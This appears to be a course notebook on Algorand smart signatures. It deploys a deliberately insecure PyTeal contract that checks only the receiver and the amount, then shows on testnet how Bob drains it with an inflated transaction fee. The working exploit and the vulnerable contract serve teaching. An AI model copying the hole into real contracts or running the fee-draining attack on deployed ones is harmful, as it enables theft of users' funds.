# Smart signatures – Transaction Fee Attack
#### 06.1 Writing Smart Contracts
##### Peter Gruber (peter.gruber@usi.ch)
2022-01-12

* Write and deploy smart Signatures

## Setup
See notebook 04.1, the lines below will always automatically load ...
* The functions in `algo_util.py`
* The accounts MyAlgo, Alice and Bob
* The Purestake credentials

In [21]:
# Loading shared code and credentials
import sys, os

codepath = '..'+os.path.sep+'..'+os.path.sep+'sharedCode'
sys.path.append(codepath)
from algo_util import *
cred = load_credentials()

# Shortcuts to directly access the 3 main accounts
MyAlgo  = cred['MyAlgo']
Alice   = cred['Alice']
Bob     = cred['Bob']
Charlie = cred['Charlie']
Dina    = cred['Dina']

In [22]:
from algosdk import account, mnemonic
from algosdk.v2client import algod
from algosdk.future import transaction
from algosdk.future.transaction import PaymentTxn
from algosdk.future.transaction import AssetConfigTxn, AssetTransferTxn, AssetFreezeTxn
from algosdk.future.transaction import LogicSig, LogicSigTransaction

import algosdk.error
import json
import base64
import hashlib

In [23]:
from pyteal import *

In [24]:
# Initialize the algod client (Testnet or Mainnet)
algod_client = algod.AlgodClient(algod_token='', algod_address=cred['algod_test'], headers=cred['purestake_token'])

In [25]:
print(Alice['public'])
print(Bob['public'])
print(Charlie['public'])

HITPAAJ4HKANMP6EUYASXDUTCL653T7QMNHJL5NODL6XEGBM4KBLDJ2D2E
O2SLRPK4I4SWUOCYGGKHHUCFJJF5ORHFL76YO43FYTB7HUO7AHDDNNR5YA
5GIOBOLZSQEHTNNXWRJ6RGNPGCKWYJYUZZKY6YXHJVKFZXRB2YLDFDVH64


#### Check Purestake API

In [26]:
last_block = algod_client.status()["last-round"]
print(f"Last committed block is: {last_block}")

Last committed block is: 19804682


## Clearing out Modesty

##### Step 1: The programmer writes down the conditions as a PyTeal program

In [27]:
max_amount = Int(int(1*1E6))                         # <---- 1e6 micro Algos = 1 Algo

modest_pyteal = And (
    Txn.receiver() == Addr(Bob["public"]),           # Receipient must be Bob
    Txn.amount() <= max_amount                       # Requested amount must be smaller than max_amount
)

# Security missing (!!!) ... do not copy-paste

##### Step 2: Compile PyTeal -> Teal

In [28]:
modest_teal = compileTeal(modest_pyteal, Mode.Signature, version=3)
print(modest_teal)

#pragma version 3
txn Receiver
addr O2SLRPK4I4SWUOCYGGKHHUCFJJF5ORHFL76YO43FYTB7HUO7AHDDNNR5YA
==
txn Amount
int 1000000
<=
&&


##### Step 3: Compile Teal -> Bytecode for AVM

In [29]:
Modest = algod_client.compile(modest_teal)
Modest

{'hash': 'B6FDPCIK7KUXF5TPTVU4EA6MMWYQEAWYA2UK2VS2VQMPO3QR5OQTYP6MUQ',
 'result': 'AyABwIQ9JgEgdqS4vVxHJWo4WDGUc9BFSkvXROVf/YdzZcTD89HfAcYxBygSMQgiDhA='}

##### Step 4: Alice funds and deploys the smart signature

In [30]:
# Step 1: prepare transaction
sp = algod_client.suggested_params()
amt = int(2.2*1e6)
txn = transaction.PaymentTxn(sender=Alice['public'], sp=sp, receiver=Modest['hash'], amt=amt)

# Step 2+3: sign and sen
stxn = txn.sign(Alice['private'])
txid = algod_client.send_transaction(stxn)

# Step 4: wait for confirmation
txinfo = wait_for_confirmation(algod_client, txid)

Current round is  19804698.
Waiting for round 19804698 to finish.
Waiting for round 19804699 to finish.
Transaction AI5GNWQIOIJT5QMILVTRMAWLUU6P4PBR5R2KJEOS472PB2JAORGQ confirmed in round 19804700.


##### Step 5: Alice informs Bob

In [31]:
print("Alice communicates to Bob the following")
print("Compiled smart signature:", Modest['result'])
print("Address of smart signature: ", Modest['hash'])

Alice communicates to Bob the following
Compiled smart signature: AyABwIQ9JgEgdqS4vVxHJWo4WDGUc9BFSkvXROVf/YdzZcTD89HfAcYxBygSMQgiDhA=
Address of smart signature:  B6FDPCIK7KUXF5TPTVU4EA6MMWYQEAWYA2UK2VS2VQMPO3QR5OQTYP6MUQ


#### Step 6: Bob proposes a transaction with very high TX fee

In [34]:
# Step 1: prepare TX
sp = algod_client.suggested_params()
sp.fee = int(2.38e6)                         # <---------- WOW! 2 ALGO transaction fee
sp.flat_fee = True

withdrawal_amt = int(0.00001*1e6)             # <---------- small
txn = PaymentTxn(sender=Modest['hash'], sp=sp, 
                 receiver=Bob['public'], amt=withdrawal_amt)

# Step 2: sign TX <---- This step is different!
encodedProg = Modest['result'].encode()
program = base64.decodebytes(encodedProg)
lsig = LogicSig(program)
stxn = LogicSigTransaction(txn, lsig)

# Step 3: send
txid = algod_client.send_transaction(stxn)

# Step 4: wait for confirmation
txinfo = wait_for_confirmation(algod_client, txid)

Current round is  19804767.
Waiting for round 19804767 to finish.
Waiting for round 19804768 to finish.
Transaction 6QPUETD7EGXHRBOWEC2Z3JWJ3NO7O7FXHCEQYV5M5OCW2ALIX6HQ confirmed in round 19804769.


#### Step 7: The Money is gone

In [35]:
# Check on Algoexplorer
print('https://testnet.algoexplorer.io/address/'+ Modest['hash'])

https://testnet.algoexplorer.io/address/B6FDPCIK7KUXF5TPTVU4EA6MMWYQEAWYA2UK2VS2VQMPO3QR5OQTYP6MUQ
